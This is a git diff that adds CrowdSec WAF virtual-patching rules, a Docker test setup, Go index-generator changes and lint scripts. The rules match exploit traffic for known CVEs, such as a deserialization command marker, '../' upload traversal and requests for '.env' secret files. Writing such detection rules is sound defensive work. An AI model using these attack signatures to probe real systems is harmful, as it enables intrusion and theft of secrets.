+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-40044.yaml
@@ -0,0 +1,38 @@
+name: crowdsecurity/vpatch-CVE-2023-40044
+description: "Detect CVE-2023-40044 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /aht/
+    - zones:
+      - METHOD
+      match:
+        type: equals
+        value: POST
+    - zones:
+      - BODY_ARGS
+      transform:
+      - b64decode
+      - lowercase
+      match:
+        type: contains
+        value: "<s:string>cmd</s:string>"
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "WS_FTP .NET deserialize RCE (CVE-2023-40044)"
+  classification:
+   - cve.CVE-2023-40044
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-502
+
+
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml
new file mode 100644
index 00000000000..f7832be9a63
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml
@@ -0,0 +1,22 @@
+name: crowdsecurity/vpatch-CVE-2023-42793
+description: "Detect CVE-2023-42793"
+rules:
+  - zones:
+    - URI
+    transform:
+    - lowercase
+    match:
+      type: endsWith
+      value: /rpc2
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "JetBrains Teamcity auth bypass (CVE-2023-42793)"
+  classification:
+   - cve.CVE-2023-42793
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-288
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml
new file mode 100644
index 00000000000..a6dd6738869
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml
@@ -0,0 +1,38 @@
+name: crowdsecurity/vpatch-CVE-2023-50164
+description: "Detect CVE-2023-50164 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: upload.action
+    - zones:
+      - METHOD
+      match:
+        type: equals
+        value: POST
+    - zones:
+      - BODY_ARGS
+      - ARGS
+      variables:
+      - uploadFileName
+      match:
+        type: contains
+        value: "../"
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "Apache Struts2 (CVE-2023-50164)"
+  classification:
+   - cve.CVE-2023-50164
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-552
+
+
diff --git a/appsec-rules/crowdsecurity/vpatch-env-access.yaml b/appsec-rules/crowdsecurity/vpatch-env-access.yaml
new file mode 100644
index 00000000000..736b949bd52
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-env-access.yaml
@@ -0,0 +1,20 @@
+name: crowdsecurity/vpatch-env-access
+description: "Detect access to .env files"
+rules:
+  - zones:
+    - URI
+    transform:
+    - lowercase
+    match:
+      type: endsWith
+      value: /.env
+labels:
+  type: scan
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:scan"
+  label: "Access to .env file"
+  classification:
+   - attack.T1595
+   - attack.T1190
diff --git a/ci.go b/ci.go
index efa3ae748f8..8ac4d0c62b5 100644
--- a/ci.go
+++ b/ci.go
@@ -6,7 +6,6 @@ import (
 	"flag"
 	"fmt"
 	"io"
-	"io/ioutil"
 	"log"
 	"os"
 
@@ -27,6 +26,8 @@ type typeInfo struct {
 	Parsers         []string               `json:"parsers,omitempty"`
 	PostOverflows   []string               `json:"postoverflows,omitempty"`
 	Scenarios       []string               `json:"scenarios,omitempty"`
+	AppsecRules     []string               `json:"appsec-rules,omitempty"`
+	AppsecConfigs   []string               `json:"appsec-configs,omitempty"`
 	Collections     []string               `json:"collections,omitempty"`
 }
 
@@ -38,6 +39,8 @@ type fileInfo struct {
 	Parsers       []string               `yaml:"parsers,omitempty"`
 	PostOverflows []string               `yaml:"postoverflows,omitempty"`
 	Scenarios     []string               `yaml:"scenarios,omitempty"`
+	AppsecRules   []string               `yaml:"appsec-rules,omitempty"`
+	AppsecConfigs []string               `yaml:"appsec-configs,omitempty"`
 	Collections   []string               `yaml:"collections,omitempty"`
 }
 
@@ -46,17 +49,12 @@ type versionInfo struct {
 	Deprecated bool   `json:"deprecated"`
 }
 
-const (
-	parsersFolder       = "parsers/"
-	scenariosFolder     = "scenarios/"
-	postoverflowsFolder = "postoverflows/"
-	collectionsFolder   = "collections/"
-)
-
 var types = []string{
 	"parsers",
 	"scenarios",
 	"postoverflows",
+	"appsec-rules",
+	"appsec-configs",
 	"collections",
 }
 
@@ -93,7 +91,7 @@ func main() {
 	flag.Parse()
 
 	if target == "all" || target == "configs" {
-		if generate == true {
+		if generate {
 			for _, t := range types {
 				configType, err := generateIndex(t)
 				if err != nil {
@@ -103,7 +101,7 @@ func main() {
 			}
 		} else {
 			// update .index file
-			f, _ := ioutil.ReadFile(inputFile)
+			f, _ := os.ReadFile(inputFile)
 
 			_ = json.Unmarshal([]byte(f), &tmpIdx)
 
@@ -116,12 +114,12 @@ func main() {
 		if err != nil {
 			panic(err)
 		}
-		if err := ioutil.WriteFile(outFile, json, 0644); err != nil {
+		if err := os.WriteFile(outFile, json, 0644); err != nil {
 			log.Fatalf("failed writting new json index : %s", err)
 		}
 
 		/*Check if the generated index is correct*/
-		indexContent, err := ioutil.ReadFile(outFile)
+		indexContent, err := os.ReadFile(outFile)
 		if err != nil {
 			log.Fatalf("Unable to read index : %v", err)
 		}
@@ -151,6 +149,4 @@ func main() {
 			log.Fatalf("failed to dump new json file : %s", err)
 		}
 	}
-	return
-
 }
diff --git a/collections/crowdsecurity/appsec-crs.md b/collections/crowdsecurity/appsec-crs.md
new file mode 100644
index 00000000000..fa5c0a41b7c
--- /dev/null
+++ b/collections/crowdsecurity/appsec-crs.md
@@ -0,0 +1,2 @@
+# ModSecurity CRS
+
diff --git a/collections/crowdsecurity/appsec-crs.yaml b/collections/crowdsecurity/appsec-crs.yaml
new file mode 100644
index 00000000000..304ff6db0e1
--- /dev/null
+++ b/collections/crowdsecurity/appsec-crs.yaml
@@ -0,0 +1,13 @@
+parsers:
+  - crowdsecurity/appsec-logs
+appsec-configs:
+  - crowdsecurity/crs
+appsec-rules:
+  - crowdsecurity/crs
+description: "Appsec: Modsecurity core rule set rules"
+author: crowdsecurity
+tags:
+  - linux
+  - http
+  - appsec
+  - modsecurity
diff --git a/collections/crowdsecurity/appsec-virtual-patching.md b/collections/crowdsecurity/appsec-virtual-patching.md
new file mode 100644
index 00000000000..f7d38651500
--- /dev/null
+++ b/collections/crowdsecurity/appsec-virtual-patching.md
@@ -0,0 +1,3 @@
+# AppSec Virtual Patching
+
+This collection contains virtual patching for commonly exploited vulnerabilities, and is inspired from the [CISA Known Exploited Vulnerabilities Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog). The goal is to provide virtual patching capabilities for the often exploited vulnerabilities, avoiding false positives while catching pople scouting your applications for juicy vulnerabilities.
diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml
new file mode 100644
index 00000000000..74a714f457b
--- /dev/null
+++ b/collections/crowdsecurity/appsec-virtual-patching.yaml
@@ -0,0 +1,32 @@
+name: crowdsecurity/appsec-virtual-patching
+appsec-rules:
+  - crowdsecurity/base-config
+  - crowdsecurity/vpatch-env-access
+  - crowdsecurity/vpatch-CVE-2023-40044
+  - crowdsecurity/vpatch-CVE-2017-9841
+  - crowdsecurity/vpatch-CVE-2020-11738
+  - crowdsecurity/vpatch-CVE-2022-27926
+  - crowdsecurity/vpatch-CVE-2022-35914
+  - crowdsecurity/vpatch-CVE-2022-46169
+  - crowdsecurity/vpatch-CVE-2023-20198
+  - crowdsecurity/vpatch-CVE-2023-22515
+  - crowdsecurity/vpatch-CVE-2023-33617
+  - crowdsecurity/vpatch-CVE-2023-34362
+  - crowdsecurity/vpatch-CVE-2023-3519
+  - crowdsecurity/vpatch-CVE-2023-42793
+  - crowdsecurity/vpatch-CVE-2023-50164
+  - crowdsecurity/vpatch-CVE-2023-38205
+  - crowdsecurity/vpatch-CVE-2023-24489
+  - crowdsecurity/vpatch-CVE-2021-3129
+  - crowdsecurity/vpatch-CVE-2021-22941
+  - crowdsecurity/vpatch-CVE-2019-12989
+  - crowdsecurity/vpatch-CVE-2022-44877
+appsec-configs:
+  - crowdsecurity/virtual-patching
+parsers:
+  - crowdsecurity/appsec-logs
+scenarios:
+  - crowdsecurity/appsec-vpatch
+description: "a generic virtual patching collection, suitable for most web servers."
+author: crowdsecurity
+
diff --git a/docker/appsec/Dockerfile b/docker/appsec/Dockerfile
new file mode 100644
index 00000000000..5ebd2c10f6e
--- /dev/null
+++ b/docker/appsec/Dockerfile
@@ -0,0 +1,28 @@
+FROM ubuntu:22.04
+
+# Install dependencies
+RUN apt-get update && apt-get install -y \
+    git \
+    make \
+    software-properties-common \
+    wget \
+    gnupg \
+    ca-certificates \
+    gettext
+
+RUN wget -O - https://openresty.org/package/pubkey.gpg | apt-key add -
+RUN echo "deb http://openresty.org/package/ubuntu $(lsb_release -sc) main"| tee /etc/apt/sources.list.d/openresty.list
+
+RUN apt-get update
+
+RUN apt-get install -y openresty
+
+# Install the bouncer
+COPY build.sh /build.sh
+COPY start.sh /start.sh
+
+RUN chmod +x /build.sh && /build.sh
+RUN chmod +x /start.sh
+
+# Set the script as the entrypoint
+ENTRYPOINT ["/start.sh"]
\ No newline at end of file
diff --git a/docker/appsec/build.sh b/docker/appsec/build.sh
new file mode 100644
index 00000000000..b6b61fa858a
--- /dev/null
+++ b/docker/appsec/build.sh
@@ -0,0 +1,20 @@
+#!/bin/bash
+set -e
+
+# clone the repo
+git clone https://github.com/crowdsecurity/cs-openresty-bouncer.git
+cd cs-openresty-bouncer
+
+# tmp until we merge
+git checkout waf_integration
+
+# make the release
+make release
+tar xzvf crowdsec-openresty-bouncer.tgz
+cd crowdsec-openresty-bouncer-v*
+
+# install the bouncer
+./install.sh -y
+
+
+
diff --git a/docker/appsec/docker-compose.yaml b/docker/appsec/docker-compose.yaml
new file mode 100644
index 00000000000..6bbf5da529b
--- /dev/null
+++ b/docker/appsec/docker-compose.yaml
@@ -0,0 +1,12 @@
+version: "3.8"
+services:
+  target:
+    build: .
+    environment:
+      - API_URL=http://127.0.0.1:8181
+      - API_KEY=this_is_a_bad_password
+      - APPSEC_URL=http://127.0.0.1:4241
+    volumes:
+      - ./nginx.conf:/usr/local/openresty/nginx/conf/nginx.conf
+    network_mode: "host" 
+
diff --git a/docker/appsec/nginx.conf b/docker/appsec/nginx.conf
new file mode 100644
index 00000000000..52b555828d3
--- /dev/null
+++ b/docker/appsec/nginx.conf
@@ -0,0 +1,37 @@
+
+worker_processes  4;
+
+events {
+    worker_connections  1024;
+}
+
+http {
+    include       mime.types;
+    default_type  application/octet-stream;
+    sendfile        on;
+    keepalive_timeout  65;
+
+    access_log /dev/stdout;
+    error_log /dev/stderr;
+
+    resolver 127.0.0.11;
+
+    include /usr/local/openresty/nginx/conf/conf.d/crowdsec_openresty.conf;
+
+    server {
+        listen       7822;
+        server_name  localhost;
+
+        location / {
+            root   html;
+            index  index.html index.htm;
+        }
+
+        error_page   500 502 503 504  /50x.html;
+        location = /50x.html {
+            root   html;
+        }
+    }
+
+
+}
\ No newline at end of file
diff --git a/docker/appsec/start.sh b/docker/appsec/start.sh
new file mode 100644
index 00000000000..365515620fb
--- /dev/null
+++ b/docker/appsec/start.sh
@@ -0,0 +1,12 @@
+#!/bin/bash
+set -x
+
+# set the API URL
+sed -i "s@API_KEY=.*@API_KEY=${API_KEY}@" /etc/crowdsec/bouncers/crowdsec-openresty-bouncer.conf
+sed -i "s@API_URL=.*@API_URL=${API_URL}@" /etc/crowdsec/bouncers/crowdsec-openresty-bouncer.conf
+echo "APPSEC_URL=${APPSEC_URL}" | tee -a /etc/crowdsec/bouncers/crowdsec-openresty-bouncer.conf
+
+cat /etc/crowdsec/bouncers/crowdsec-openresty-bouncer.conf
+
+# Start OpenResty
+exec openresty -g 'daemon off;'
\ No newline at end of file
diff --git a/generate.go b/generate.go
index 7f7c1878d57..76358e0e6e0 100644
--- a/generate.go
+++ b/generate.go
@@ -3,7 +3,6 @@ package main
 import (
 	"encoding/base64"
 	"fmt"
-	"io/ioutil"
 	"log"
 	"os"
 	"path"
@@ -14,14 +13,14 @@ import (
 	"gopkg.in/yaml.v2"
 )
 
-func inSlice(s string, slice []string) bool {
-	for _, str := range slice {
-		if str == s {
-			return true
-		}
-	}
-	return false
-}
+const (
+	PARSER_TYPE         = "parsers"
+	SCENARIO_TYPE       = "scenarios"
+	POSTOVERFLOW_TYPE   = "postoverflows"
+	APPSEC_RULES_TYPE   = "appsec-rules"
+	APPSEC_CONFIGS_TYPE = "appsec-configs"
+	COLLECTIONS_TYPE    = "collections"
+)
 
 func (ti *typeInfo) generate(filepath string, configType string) (string, error) {
 	pathSplit := strings.Split(filepath, "/")
@@ -39,28 +38,25 @@ func (ti *typeInfo) generate(filepath string, configType string) (string, error)
 	// set user, stage and config name
 	var user string
 	var configName string
-	if configType == "parsers" || configType == "postoverflows" {
+
+	switch configType {
+	case PARSER_TYPE, POSTOVERFLOW_TYPE:
 		if len(pathSplit) != 3 {
-			return "", fmt.Errorf("invalid filepath '%s', should be : './%s//<user>/<scenario.yaml>'", configType, filepath)
+			return "", fmt.Errorf("invalid filepath '%s', should be : './%s/<user>/<scenario.yaml>'", configType, filepath)
 		}
 		ti.Stage = pathSplit[0]
 		user = pathSplit[1]
 		configName = pathSplit[2]
 		configName = strings.Split(configName, ".")[0]
-	} else if configType == "scenarios" {
-		if len(pathSplit) != 2 {
-			return "", fmt.Errorf("invalid filepath '%s', should be : './scenarios/<user>/<scenario.yaml>'", filepath)
-		}
-		user = pathSplit[0]
-		configName = pathSplit[1]
-		configName = strings.Split(configName, ".")[0]
-	} else if configType == "collections" {
+	case SCENARIO_TYPE, APPSEC_RULES_TYPE, APPSEC_CONFIGS_TYPE, COLLECTIONS_TYPE:
 		if len(pathSplit) != 2 {
-			return "", fmt.Errorf("invalid filepath '%s', should be : './collections/<user>/<scenario.yaml>'", filepath)
+			return "", fmt.Errorf("invalid filepath '%s', should be : './%s/<user>/<scenario.yaml>'", configType, filepath)
 		}
 		user = pathSplit[0]
 		configName = pathSplit[1]
 		configName = strings.Split(configName, ".")[0]
+	default:
+		return "", fmt.Errorf("invalid config type '%s'", configType)
 	}
 
 	// set the filepath
@@ -72,7 +68,7 @@ func (ti *typeInfo) generate(filepath string, configType string) (string, error)
 
 	/* Get description, author and references from the file */
 	var fInfo fileInfo
-	yamlFile, err := ioutil.ReadFile(filepath)
+	yamlFile, err := os.ReadFile(filepath)
 	if err != nil {
 		return "", err
 	}
@@ -123,6 +119,16 @@ func (ti *typeInfo) generate(filepath string, configType string) (string, error)
 		} else {
 			ti.Collections = nil
 		}
+		if len(fInfo.AppsecRules) > 0 {
+			ti.AppsecRules = fInfo.AppsecRules
+		} else {
+			ti.AppsecRules = nil
+		}
+		if len(fInfo.AppsecConfigs) > 0 {
+			ti.AppsecConfigs = fInfo.AppsecConfigs
+		} else {
+			ti.AppsecConfigs = nil
+		}
 	}
 
 	// versions informations (digest and deprecated for each version)
@@ -162,7 +168,7 @@ func (ti *typeInfo) generate(filepath string, configType string) (string, error)
 	hubName := fmt.Sprintf("%s/%s", user, configName)
 	/*if we're all good, check if markdown documentation exists and join it*/
 	//pdocpath
-	mdFile, err := ioutil.ReadFile(pdocpath)
+	mdFile, err := os.ReadFile(pdocpath)
 	if err == nil {
 		ti.LongDescription = base64.StdEncoding.EncodeToString([]byte(string(mdFile)))
 	}
@@ -193,7 +199,7 @@ func generateIndex(configType string) (map[string]typeInfo, error) {
 			var err error
 			hubName, err = info.generate(filepath, configType)
 			if err != nil {
-				fmt.Printf("skipping '%s' because : %s\n", filepath, err.Error())
+				fmt.Printf("skipping '%s' for index generation because : %s\n", filepath, err.Error())
 			} else {
 				tInfo[hubName] = info
 			}
diff --git a/parsers/s01-parse/crowdsecurity/appsec-logs.yaml b/parsers/s01-parse/crowdsecurity/appsec-logs.yaml
new file mode 100644
index 00000000000..185d5bf54fe
--- /dev/null
+++ b/parsers/s01-parse/crowdsecurity/appsec-logs.yaml
@@ -0,0 +1,27 @@
+onsuccess: next_stage
+format: 3.0
+#debug: true
+filter: "evt.Parsed.program == 'appsec'"
+name: crowdsecurity/appsec-logs
+description: "Parse Appsec events"
+statics:
+  - meta: service
+    value: appsec
+  - meta: source_ip
+    expression: "evt.Parsed.source_ip"
+  - meta: target_host
+    expression: "evt.Parsed.target_host"
+  - meta: request_uuid
+    expression: "evt.Parsed.req_uuid"
+  - meta: target_uri
+    expression: "evt.Parsed.target_uri"
+#was the request blocked ?
+  - meta: log_type
+    expression: |
+      evt.Appsec.HasInBandMatches ? "appsec-block" : "appsec-info"
+  - meta: rule_name
+    expression: evt.Appsec.GetName()
+  - meta: rule_ids
+    expression: Sprintf("%+v", evt.Appsec.GetRuleIDs())
+  - meta: remediation_cmpt_ip
+    expression: "evt.Parsed.remediation_cmpt_ip"
diff --git a/parsers/s01-parse/crowdsecurity/caddy-logs.yaml b/parsers/s01-parse/crowdsecurity/caddy-logs.yaml
index 4f922c969fb..c311188198b 100644
--- a/parsers/s01-parse/crowdsecurity/caddy-logs.yaml
+++ b/parsers/s01-parse/crowdsecurity/caddy-logs.yaml
@@ -1,6 +1,5 @@
 filter: "evt.Parsed.program startsWith 'caddy' && UnmarshalJSON(evt.Parsed.message, evt.Unmarshaled, 'caddy') in ['', nil]"
 onsuccess: next_stage
-debug: true
 name: crowdsecurity/caddy-logs
 description: "Parse caddy logs"
 statics:
diff --git a/parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml b/parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml
index 40561328905..8c271e116f2 100644
--- a/parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml
+++ b/parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml
@@ -1,5 +1,4 @@
 onsuccess: next_stage
-debug: true
 name: crowdsecurity/palo-alto-threat-log
 description: "Parse palo-alto-threat-log logs"
 filter: "evt.Parsed.program == 'palo-alto-threat'"
diff --git a/scenarios/crowdsecurity/appsec-vpatch.yaml b/scenarios/crowdsecurity/appsec-vpatch.yaml
new file mode 100644
index 00000000000..88e28ba4fcb
--- /dev/null
+++ b/scenarios/crowdsecurity/appsec-vpatch.yaml
@@ -0,0 +1,19 @@
+type: leaky
+format: 3.0
+name: crowdsecurity/appsec-vpatch
+description: "Detect appsec attacks"
+filter: "evt.Meta.log_type == 'appsec-block'"
+distinct: evt.Meta.rule_name
+leakspeed: "60s"
+capacity: 1
+groupby: evt.Meta.source_ip
+blackhole: 1m
+labels:
+  service: http
+  confidence: 3
+  spoofable: 0
+  classification:
+    - attack.T1110
+  label: "appsec blocked"
+  behavior: "http:exploit"
+  remediation: true
diff --git a/scenarios/crowdsecurity/crowdsec-appsec-inband.yaml b/scenarios/crowdsecurity/crowdsec-appsec-inband.yaml
new file mode 100644
index 00000000000..a0c37115e0f
--- /dev/null
+++ b/scenarios/crowdsecurity/crowdsec-appsec-inband.yaml
@@ -0,0 +1,19 @@
+type: leaky
+filter: evt.Parsed.program == 'crowdsec-appsec' && evt.Appsec.HasInBandMatches == true && evt.Parsed.action in ["deny", "drop"]
+#debug: true
+name: crowdsecurity/crowdsec-appsec-inband
+description: IP has triggered multiples In Band CrowdSec appsec rules
+blackhole: 1m
+leakspeed: 30s
+capacity: 1
+groupby: evt.Meta.source_ip
+distinct: evt.Appsec.GetName()
+labels:
+  confidence: 3
+  spoofable: 0
+  classification:
+   - attack.T1190
+  behavior: "http:exploit"
+  label: "Triggered multiple inband CrowdSec appsec rules"
+  service: http
+  remediation: true
diff --git a/scenarios/crowdsecurity/crowdsec-appsec-outofband.yaml b/scenarios/crowdsecurity/crowdsec-appsec-outofband.yaml
new file mode 100644
index 00000000000..a638dc36999
--- /dev/null
+++ b/scenarios/crowdsecurity/crowdsec-appsec-outofband.yaml
@@ -0,0 +1,51 @@
+# just count distinct number of requests getting blocked
+type: leaky
+filter: evt.Parsed.program == 'crowdsec-waap' && evt.Appsec.HasInBandMatches == false && evt.Parsed.action in ["deny", "drop"]
+name: crowdsecurity/crowdsec-appsec-outofband
+description: IP has triggered more than 5 CrowdSec Out Of Band Waap rules
+blackhole: 2m
+leakspeed: 30s
+capacity: 5
+labels:
+  type: exploit
+  remediation: true
+groupby: "evt.Meta.source_ip"
+#---
+# at least requests blocked on 3 distinct URIs
+#type: leaky
+#debug: true
+#filter: evt.Parsed.program == 'crowdsec-waap' && evt.Parsed.action == "deny"
+#name: crowdsecurity/waf-probing
+#description: "WAF probing"
+#blackhole: 2m
+#leakspeed: 60s
+#capacity: 5
+#groupby: "evt.Meta.source_ip + evt.Parsed.target_uri"
+#labels:
+#  type: exploit
+#  remediation: true
+#---
+# # at least 5 requests blocked with **distinct** IDs
+#type: conditional
+#debug: true
+#name: crowdsecurity/xss-probing
+#description: at least 5 different XSS rules
+#filter: evt.Parsed.program == 'crowdsec-waap' && evt.Parsed.action == "deny"
+#condition: len( distinct( merge( all(evt.Queue, { #.Waap.GetIDs()}) ) ) ) > 5
+#condition: |
+#  LogInfo("%+v", FlattenDistinct( 
+#      map( queue.Queue, 
+#      #.Waap.ByTagRx(".*xss.*").GetRuleIDs()
+#      ) 
+#    )) &&
+#  len( 
+#    FlattenDistinct( 
+#      map( queue.Queue, 
+#      #.Waap.ByTagRx(".*xss.*").GetRuleIDs()
+#      ) 
+#    )) > 5
+#condition: 'Distance("aa", "bb", "cc", { #.Parsed.toto == 1 })'
+#capacity: -1
+#cache_size: 1000
+#leakspeed: 30s
+#distinct: evt.Meta.source_ip
\ No newline at end of file
diff --git a/scripts/.scenariosignore b/scripts/.scenariosignore
index 6a9041e08ef..e4296b3ba6b 100644
--- a/scripts/.scenariosignore
+++ b/scripts/.scenariosignore
@@ -3,3 +3,5 @@ crowdsecurity/postscreen-rbl
 crowdsecurity/postfix-spam
 crowdsecurity/palo-alto-threat
 crowdsecurity/exim-spam
+crowdsecurity/base-config
+crowdsecurity/crs
\ No newline at end of file
diff --git a/scripts/appsec_vpatch_lint.py b/scripts/appsec_vpatch_lint.py
new file mode 100644
index 00000000000..71c21de26a3
--- /dev/null
+++ b/scripts/appsec_vpatch_lint.py
@@ -0,0 +1,99 @@
+import os
+import yaml
+import argparse
+from yaml.loader import SafeLoader
+
+VPATCH_COLLECTION_FILEPATH = "./collections/crowdsecurity/appsec-virtual-patching.yaml"
+VPATCH_COLLECTION_NAME = "crowdsecurity/appsec-virtual-patching"
+WORKFLOW_FILEPATH = ".github/workflows/appsec_vpatch_lint.yaml"
+SCRIPT_FILEPATH = "scripts/appsec_vpatch_lint.py"
+author = os.environ.get("AUTHOR", "ghost")
+
+INTRO_STR = f"""
+Hello @{author} and thank you for your contribution!
+
+It seems that the following scenarios are not part of the '{VPATCH_COLLECTION_NAME}' collection:
+
+"""
+
+OK_STR = f"""
+Hello @{author},
+
+The new VPATCH Rule is compliant, thank you for your contribution!
+"""
+
+
+def main():
+    args = parse_args()
+    if args.hub == "":
+        print("[-] Please provide the hub path with the --hub argument")
+        sys.exit(1)
+
+    changed_files = os.environ.get("changed_files", "").split(",")
+    if (
+        changed_files == [""]
+        or WORKFLOW_FILEPATH
+        in changed_files  # if the workflow file has been modified, we want to run the script on all rules
+        or SCRIPT_FILEPATH
+        in changed_files  # if the script has been modified, we want to run it on all rules
+    ):
+        changed_files = []
+        print("[-] No changed files found, run on all files.")
+    else:
+        print("[+] Changed files: {}".format(changed_files))
+
+    vpatch_collection = yaml.load(
+        open(VPATCH_COLLECTION_FILEPATH, "r"), Loader=SafeLoader
+    )
+    vpatch_collection_rules = vpatch_collection["appsec-rules"]
+    missing_rules = list()
+
+    hub_appsecrules_path = os.path.join(args.hub, "appsec-rules")
+    for r, d, f in os.walk(hub_appsecrules_path):
+        for file in f:
+            if file.endswith(".yaml") or file.endswith(".yml"):
+                if len(changed_files) == 0 or (
+                    len(changed_files) > 0 and file in changed_files
+                ):
+                    if not file.startswith("vpatch-"):
+                        continue
+                    f = open(os.path.join(r, file), "r")
+                    data = list(yaml.load_all(f, Loader=SafeLoader))
+                    print("[*] Processing rule '{}'".format(file))
+                    for rule in data:
+                        if rule["name"] not in vpatch_collection_rules:
+                            missing_rules.append(rule["name"])
+
+    f = open(args.errors, "w")
+    if len(missing_rules) > 0:
+        f.write(INTRO_STR)
+        for rule in missing_rules:
+            f.write("**{}**\n".format(rule))
+    else:
+        f.write(OK_STR)
+
+    f.close()
+
+
+def parse_args():
+    parser = argparse.ArgumentParser(
+        description="Generate CrowdSec Scenarios taxonomy file"
+    )
+    parser.add_argument("--hub", type=str, help="Hub folder path", default=".")
+    parser.add_argument(
+        "-e",
+        "--errors",
+        type=str,
+        help="Output errors file path",
+        default="./appsec_vpatch_cve_error.md",
+    )
+
+    parser.add_argument(
+        "-v", "--verbose", action="store_true", help="Verbose mode", default=False
+    )
+
+    return parser.parse_args()
+
+
+if __name__ == "__main__":
+    main()
diff --git a/scripts/scenario_taxonomy.py b/scripts/scenario_taxonomy.py
index a656b80ed0c..fb53ff8ee22 100644
--- a/scripts/scenario_taxonomy.py
+++ b/scripts/scenario_taxonomy.py
@@ -6,15 +6,17 @@
 import yaml
 import argparse
 from yaml.loader import SafeLoader
+from itertools import chain
 
 
 CVE_RE = re.compile(r"CVE-\d{4}-\d{4,7}")
+CWE_RE = re.compile(r"CWE-\d{2,6}")
 author = os.environ.get("AUTHOR", "ghost")
 
 OK_STR = f"""
 Hello @{author},
 
-Scenarios are compliant with the taxonomy, thank you for your contribution!
+Scenarios/AppSec Rule are compliant with the taxonomy, thank you for your contribution!
 """
 
 INTRO_STR = f"""
@@ -23,7 +25,7 @@
 I'm a bot that helps maintainers to validate scenarios and ensure they include all the required information.
 I've found some errors in your scenarios, please fix them and re-submit your PR, or ask for help if you need it.
 
-The following scenarios have errors:
+The following items have errors:
 
 """
 
@@ -128,6 +130,26 @@ def get_mitre_techniques_from_label(labels, mitre_data):
     return ret, errors
 
 
+def get_cwe_from_label(labels):
+    ret = list()
+    errors = list()
+    if "classification" not in labels:
+        return ret, errors
+
+    for classification in labels["classification"]:
+        split_cwe = classification.split(".")
+        if split_cwe[0] != "cwe":
+            continue
+        cwe = split_cwe[1].upper()
+
+        if CWE_RE.match(cwe) == None:
+            errors.append("bad CWE format: {}".format(cwe))
+            continue
+        ret.append(cwe)
+
+    return ret, errors
+
+
 def get_cve_from_label(labels):
     ret = list()
     errors = list()
@@ -165,7 +187,7 @@ def main():
 
     stats = {"scenarios_ok": [], "scenarios_nok": [], "mitre": [], "behaviors": []}
     hub_scenarios_path = os.path.join(args.hub, "scenarios")
-
+    hub_appsecrules_path = os.path.join(args.hub, "appsec-rules")
     ignore_list = list()
     if os.path.exists(args.ignore):
         ignore_list = open(args.ignore).read().split("\n")
@@ -174,7 +196,9 @@ def main():
     scenarios_taxonomy = dict()
     filepath_list = []
 
-    for r, d, f in os.walk(hub_scenarios_path):
+    for r, d, f in chain.from_iterable(
+        os.walk(path) for path in [hub_scenarios_path, hub_appsecrules_path]
+    ):
         for file in f:
             if file.endswith(".yaml") or file.endswith(".yml"):
                 filepath_list.append(os.path.join(r, file))
@@ -183,6 +207,7 @@ def main():
     cpt = 0
     mitres = dict()
     for filepath in filepath_list:
+        print("[+] Processing {}".format(filepath))
         f = open(filepath, "r")
         data = list(yaml.load_all(f, Loader=SafeLoader))
 
@@ -209,7 +234,6 @@ def main():
 
             if len(mitre_techniques) == 0:
                 scenario_errors.append("`attack` not found in labels.classification")
-
             service = labels.get("service", None)
 
             for m in mitre_techniques:
@@ -229,6 +253,8 @@ def main():
 
             cves, cves_errors = get_cve_from_label(labels)
             scenario_errors.extend(cves_errors)
+            cwes, cwes_errors = get_cwe_from_label(labels)
+            scenario_errors.extend(cwes_errors)
 
             scenario_label = ""
             confidence = 0
@@ -281,6 +307,8 @@ def main():
             if len(scenario_errors) > 0 and filepath[2:] in changed_files:
                 errors[scenario["name"]] = scenario_errors
                 stats["scenarios_nok"].append(scenario["name"])
+            else:
+                stats["scenarios_ok"].append(scenario["name"])
 
             scenarios_taxonomy[scenario["name"]] = {
                 "name": scenario["name"],
@@ -294,10 +322,10 @@ def main():
                 "service": service,
             }
 
-            stats["scenarios_ok"].append(scenario["name"])
-
             if len(cves) > 0:
                 scenarios_taxonomy[scenario["name"]]["cves"] = cves
+            if len(cwes) > 0:
+                scenarios_taxonomy[scenario["name"]]["cwes"] = cwes
 
     f = open(args.output, "w")
     f.write(json.dumps(scenarios_taxonomy, indent=2))
diff --git a/taxonomy/scenarios.json b/taxonomy/scenarios.json
index 7c9c8963edc..c7a52a70399 100644
--- a/taxonomy/scenarios.json
+++ b/taxonomy/scenarios.json
@@ -1,4 +1,441 @@
 {
+  "crowdsecurity/vpatch-CVE-2017-9841": {
+    "name": "crowdsecurity/vpatch-CVE-2017-9841",
+    "description": "Detect CVE-2017-9841 exploits ",
+    "label": "PHPUnit RCE (CVE-2017-9841)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2017-9841"
+    ],
+    "cwes": [
+      "CWE-94"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2019-12989": {
